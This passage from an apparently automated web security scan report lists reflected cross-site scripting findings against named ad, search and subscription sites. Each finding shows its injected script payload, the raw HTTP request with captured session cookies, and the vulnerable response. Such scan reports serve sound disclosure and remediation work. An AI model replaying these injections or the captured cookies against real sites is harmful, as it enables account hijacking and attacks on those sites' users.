                                           java.lang.NumberFormatException: For input string: "225976848579<script>alert(1)</script>8f27a3ba150"

   
                                                           </head>
...[SNIP]...

5.29. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 70de1--><script>alert(1)</script>17479fecbed was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=1515622&placementId=151562570de1--><script>alert(1)</script>17479fecbed&pid=2259768&ps=-1&zw=580&zh=90&url=http%3A//www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html&v=5&dct=Geraldine%20Ferraro%20Dead%3A%20First%20Female%20Vice%20Presidential%20Candidate%20Dies%20At%2075&metakw=geraldine,ferraro,dead%3A,first,female,vice,presidential,candidate,dies,at,75,politics HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16lsqii1n1a3cr; TData=99999%7C61674%7C60489%7C60740%7C60490%7C56262%7C61576%7C60493%7C50963%7C60491%7C60515%7C50455%7C60514%7C53656%7C56830%7C52615%7C60546%7C56918%7C60500%7C56920%7C56930%7C56555%7C53435%7C51133%7C56917%7C56780%7C56500%7C52611%7C54463%7C56969%7C56835%7C54938%7C56761%7C56768%7C54173%7C53603_Wed%2C%2023%20Mar%202011%2019%3A39%3A43%20GMT

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:53 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3400
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "151562570de1--><script>alert(1)</script>17479fecbed" -->
...[SNIP]...

5.30. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 87ebb--><script>alert(1)</script>fd77cc4c5e6 was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=1515622&placementId=1515625&pid=2259768&ps=-187ebb--><script>alert(1)</script>fd77cc4c5e6&zw=580&zh=90&url=http%3A//www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html&v=5&dct=Geraldine%20Ferraro%20Dead%3A%20First%20Female%20Vice%20Presidential%20Candidate%20Dies%20At%2075&metakw=geraldine,ferraro,dead%3A,first,female,vice,presidential,candidate,dies,at,75,politics HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16lsqii1n1a3cr; TData=99999%7C61674%7C60489%7C60740%7C60490%7C56262%7C61576%7C60493%7C50963%7C60491%7C60515%7C50455%7C60514%7C53656%7C56830%7C52615%7C60546%7C56918%7C60500%7C56920%7C56930%7C56555%7C53435%7C51133%7C56917%7C56780%7C56500%7C52611%7C54463%7C56969%7C56835%7C54938%7C56761%7C56768%7C54173%7C53603_Wed%2C%2023%20Mar%202011%2019%3A39%3A43%20GMT

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:59 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3839
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-187ebb--><script>alert(1)</script>fd77cc4c5e6" -->
   
...[SNIP]...

5.31. http://api.bing.com/qsonhs.aspx [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bing.com
Path:   /qsonhs.aspx

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload ca1a8<img%20src%3da%20onerror%3dalert(1)>58aa3f015ee was submitted in the q parameter. This input was echoed as ca1a8<img src=a onerror=alert(1)>58aa3f015ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /qsonhs.aspx?FORM=ASAPIW&q=ca1a8<img%20src%3da%20onerror%3dalert(1)>58aa3f015ee HTTP/1.1
Host: api.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/maps.default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; _HOP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099; RMS=F=O

Response

HTTP/1.1 200 OK
Content-Length: 79
Content-Type: application/json; charset=utf-8
X-Akamai-TestID: 9a3fe25a47d543bab74c1bbffe2e1322
Date: Sat, 26 Mar 2011 01:03:07 GMT
Connection: close

{"AS":{"Query":"ca1a8<img src=a onerror=alert(1)>58aa3f015ee","FullResults":1}}

5.32. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [PGTP parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ezsub.net
Path:   /isapi/foxisapi.dll/main.sv.run

Issue detail

The value of the PGTP request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd650"><script>alert(1)</script>4a55cdcca00 was submitted in the PGTP parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=Scd650"><script>alert(1)</script>4a55cdcca00 HTTP/1.1
Host: ezsub.net
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/subscription-services
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">

<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">
<META NAME="Generator" CONTENT="">
<TITLE>Subscr
...[SNIP]...
<input type="hidden" name="PGTP" value="Scd650"><script>alert(1)</script>4a55cdcca00">
...[SNIP]...

5.33. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [PUBID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ezsub.net
Path:   /isapi/foxisapi.dll/main.sv.run

Issue detail

The value of the PUBID request parameter is copied into the HTML document as plain text between tags. The payload f5b59<script>alert(1)</script>e93d24ee706 was submitted in the PUBID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586f5b59<script>alert(1)</script>e93d24ee706&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S HTTP/1.1
Host: ezsub.net
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/subscription-services
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">

<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">
<META NAME="Generator" CONTENT="">
<TITLE>Web Ca
...[SNIP]...
<BR>
ERROR: Web Page is corrupted! Wrong PUBID=586F5B59<SCRIPT>ALERT(1)</SCRIPT>E93D24EE706.<BR>
...[SNIP]...

5.34. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [RDRID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ezsub.net
Path:   /isapi/foxisapi.dll/main.sv.run

Issue detail

The value of the RDRID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87621"><script>alert(1)</script>5029ac893ef was submitted in the RDRID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=87621"><script>alert(1)</script>5029ac893ef&SBTYPE=QN&PGTP=S HTTP/1.1
Host: ezsub.net
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/subscription-services
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">

<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">
<META NAME="Generator" CONTENT="">
<TITLE>New Su
...[SNIP]...
<input type="hidden" name="RDRID" value="87621"><SCRIPT>ALERT(1)</SCRIPT>5029AC893EF">
...[SNIP]...

5.35. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [SBTYPE parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ezsub.net
Path:   /isapi/foxisapi.dll/main.sv.run

Issue detail

The value of the SBTYPE request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ccef"><script>alert(1)</script>0d1de7150bc was submitted in the SBTYPE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN7ccef"><script>alert(1)</script>0d1de7150bc&PGTP=S HTTP/1.1
Host: ezsub.net
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/subscription-services
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">

<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">
<META NAME="Generator" CONTENT="">
<TITLE>New Su
...[SNIP]...
<input type="hidden" name="SBTYPE" value="QN7CCEF"><SCRIPT>ALERT(1)</SCRIPT>0D1DE7150BC">
...[SNIP]...

5.36. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [SOURCE parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ezsub.net
Path:   /isapi/foxisapi.dll/main.sv.run

Issue detail

The value of the SOURCE request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2eca"><script>alert(1)</script>0294bf7bc9 was submitted in the SOURCE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INETd2eca"><script>alert(1)</script>0294bf7bc9&RDRID=&SBTYPE=QN&PGTP=S HTTP/1.1
Host: ezsub.net
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/subscription-services
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">

<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">
<META NAME="Generator" CONTENT="">
<TITLE>New Su
...[SNIP]...
<input type="hidden" name="SOURCE" value="INETD2ECA"><SCRIPT>ALERT(1)</SCRIPT>0294BF7BC9">
...[SNIP]...

5.37. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [jt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ezsub.net
Path:   /isapi/foxisapi.dll/main.sv.run

Issue detail

The value of the jt request parameter is copied into the HTML document as plain text between tags. The payload 794cd<script>alert(1)</script>e16bfebfc40 was submitted in the jt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc794cd<script>alert(1)</script>e16bfebfc40&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S HTTP/1.1
Host: ezsub.net
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/subscription-services
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-Type: text/html

<html><body><h1>FOXISAPI call failed</h1><p><b>Progid is:</b> main.sv
<p><b>Method is:</b> run
<p><b>Parameters are:</b> jt=starr_wc794cd<script>alert(1)</script>e16bfebfc40&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
<p>
...[SNIP]...

5.38. http://fonts.citysbest.com/k/uni0vle-e.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.citysbest.com
Path:   /k/uni0vle-e.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 147e7<script>alert(1)</script>0be166769ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k147e7<script>alert(1)</script>0be166769ba/uni0vle-e.css?3bb2a6e53c9684ffdc9a9afe1b5b2a62161fbabe860bcaa1511187a688f40137427ddfe1e23e854aa7ae99cf666e8bb2e4a145fd987672fc579851ac33383c64a404166105abae023ce7c3a10a67aa5895 HTTP/1.1
Host: fonts.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1301171827082-New%7C1364243827082%3B%20s_nrgvo%3DNew%7C1364243827091%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.001764
Content-Length: 68
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 20:36:35 GMT
Connection: close

Not Found: /k147e7<script>alert(1)</script>0be166769ba/uni0vle-e.css

5.39. http://fonts.citysbest.com/k/uni0vle-e.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.citysbest.com
Path:   /k/uni0vle-e.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e468a<script>alert(1)</script>47bf0b2c2b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k/uni0vle-e.csse468a<script>alert(1)</script>47bf0b2c2b0?3bb2a6e53c9684ffdc9a9afe1b5b2a62161fbabe860bcaa1511187a688f40137427ddfe1e23e854aa7ae99cf666e8bb2e4a145fd987672fc579851ac33383c64a404166105abae023ce7c3a10a67aa5895 HTTP/1.1
Host: fonts.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1301171827082-New%7C1364243827082%3B%20s_nrgvo%3DNew%7C1364243827091%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.001332
Content-Length: 68
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 20:36:35 GMT
Connection: close

Not Found: /k/uni0vle-e.csse468a<script>alert(1)</script>47bf0b2c2b0

5.40. http://i1.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://i1.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f4f35<img%20src%3da%20onerror%3dalert(1)>f86de5af1be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f4f35<img src=a onerror=alert(1)>f86de5af1be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?boxid=ctl00_Masthead_Search_SearchTextBox&btnid=ctl00_Masthead_Search_SearchButton&brand=TechNet&loc=en-us&focusOnInit=true&Refinement=86&watermark=TechNet%20Magazine&f4f35<img%20src%3da%20onerror%3dalert(1)>f86de5af1be=1 HTTP/1.1
Host: i1.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/magazine/ff426023.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301092939992:ss=1301092848759; MS0=2a3c4c9fe97247d48c9a5163057b9a69; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi]0001?@E0I02h?@E0I

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
ETag: 93c60764a7ce82b2ad6321ad9ce04f9c
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB36
Vary: Accept-Encoding
Cache-Control: public, max-age=43200
Expires: Sat, 26 Mar 2011 13:41:44 GMT
Date: Sat, 26 Mar 2011 01:41:44 GMT
Content-Length: 12899
Connection: close


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
,"boxId":"ctl00_Masthead_Search_SearchTextBox","btnId":"ctl00_Masthead_Search_SearchButton","focusOnInit":true,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&Refinement=86&f4f35<img src=a onerror=alert(1)>f86de5af1be=1","scopeId":"9","searchLocation":"http:\/\/social.TechNet.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search Tec
...[SNIP]...

5.41. http://i3.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://i3.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 54008<img%20src%3da%20onerror%3dalert(1)>89def521705 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 54008<img src=a onerror=alert(1)>89def521705 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?boxid=HeaderSearchTextBox&btnid=HeaderSearchButton&brand=TechNet&loc=en-us&watermark=TechNet&focusOnInit=false&54008<img%20src%3da%20onerror%3dalert(1)>89def521705=1 HTTP/1.1
Host: i3.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi600017030E02h7030E; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; omniID=ue; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301090290290:ss=1301090290290; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF

Response

HTTP/1.1 200 OK
ntCoent-Length: 12845
Content-Type: application/x-javascript
ETag: 3a527f2cf9226449bb99733ecdd6b9ad
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB31
Content-Length: 12845
Cache-Control: public, max-age=43200
Expires: Sat, 26 Mar 2011 13:40:07 GMT
Date: Sat, 26 Mar 2011 01:40:07 GMT
Connection: close
Vary: Accept-Encoding


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
archBox({"allowEmptySearch":false,"appId":"2","boxId":"HeaderSearchTextBox","btnId":"HeaderSearchButton","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&54008<img src=a onerror=alert(1)>89def521705=1","scopeId":"9","searchLocation":"http:\/\/social.TechNet.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search Tec
...[SNIP]...

5.42. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://i4.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 67fe9<img%20src%3da%20onerror%3dalert(1)>e5797209df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 67fe9<img src=a onerror=alert(1)>e5797209df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?boxid=ctl00_Masthead_Search_SearchTextBox&btnid=ctl00_Masthead_Search_SearchButton&brand=TechNet&loc=en-us&focusOnInit=true&Refinement=86&watermark=TechNet%20Magazine&67fe9<img%20src%3da%20onerror%3dalert(1)>e5797209df=1 HTTP/1.1
Host: i4.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/magazine/gg670984.aspx
